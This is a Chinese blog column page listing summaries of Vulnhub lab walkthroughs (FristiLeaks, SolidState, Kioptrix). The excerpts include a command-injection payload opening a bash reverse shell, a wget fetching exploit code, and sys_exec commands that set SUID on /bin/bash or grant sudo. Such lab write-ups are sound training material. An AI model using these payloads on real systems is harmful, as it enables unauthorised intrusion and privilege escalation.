vulnhub靶机
文章平均质量分 84
a2FpX2tr
君子善假于物也
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
Vulnhub-FristiLeaks打靶
总结:通过靶机名发现fristi目录,f12发现注释,进行base64解码后知道了密码,登录后使用apache解析漏洞成功获取到shell,最后使用脏牛进行提权原创 2024-12-27 17:49:36 · 754 阅读 · 0 评论 -
Vulnhub-SolidState打靶
通过James-admin的默认密码登录后,修改所有用户的密码后,登录pop3发现邮件里面的ssh密码,登录并进行rbash逃逸,最后使用root执行的py文件进行提权原创 2024-12-25 22:22:30 · 1009 阅读 · 0 评论 -
Vulnhub-Kioptrix 2014 打靶
通过历史漏洞读取apache配置文件,知道配置规则后访问8080,又通过8080页面的历史漏洞getshell,最后使用nc上传提权的exp,进行编译,运行后得到root权限原创 2024-12-11 20:05:13 · 1838 阅读 · 0 评论 -
Vulnhub-Kioptrix Level 4 打靶
UDF提权不止有创建新用户并赋予root权限,下面还有几种方法供大家选择:1. 设置 SUID 位通过设置 SUID 位,允许普通用户以 root 权限运行某些程序,例如 /bin/bash:SELECT sys_exec('chmod u+s /bin/bash');2.将用户 john 添加到 sudo 组SELECT sys_exec('/usr/sbin/usermod -aG sudo john');3.修改系统登录文件(如 /etc/passwd)将 root 用户的密码直接移除原创 2024-12-10 19:45:20 · 886 阅读 · 0 评论 -
Vulnhub-Kioptrix Level 3 打靶方法二
Vulnhub-Kioptrix Level 3 打靶方法一-优快云博客。原创 2024-12-09 19:46:11 · 466 阅读 · 0 评论 -
Vulnhub-Kioptrix Level 3 打靶方法一
arp-scan -l 主机发现,确定192.168.213.134为靶机。原创 2024-12-08 21:08:09 · 1486 阅读 · 0 评论 -
Vulnhub-Kioptrix Level 2 打靶
现在功能正常了 nc监听并构造payload反弹shell:127.0.0.1 && /bin/bash -c 'bash -i >& /dev/tcp/192.168.213.128/443 0>&1'nmap -sn 192.168.213.0/24 #在靶机打开时和未打开时使用这条命令,判断那个IP为靶机。apache 2.0.52有 dos漏洞,也探测出有csrf漏洞,没法getshell,放弃。是一个登录界面,先f12看一下,会不会泄露出是什么cms或发现其他的敏感信息。原创 2024-12-07 17:47:49 · 1918 阅读 · 0 评论 -
Vulnhub Kioptrix Level 1打靶
searchsploit apache mod_ssl 发现能利用的exploit, 远程缓冲区溢出,能拿到shell。发现apache版本为1.3.20,打开网页使用Wappalyzer又发现mod_ssl 版本为2.8.4。在 http://github.com/heltonWernik/OpenLuck 找到编译利用的方法。在靶机上wget http://192.168.213.132:8888/ptrace-kmod.c。#对开放的端口进行详细的探测服务版本,保存到detail中。原创 2024-12-06 21:09:26 · 559 阅读 · 0 评论
分享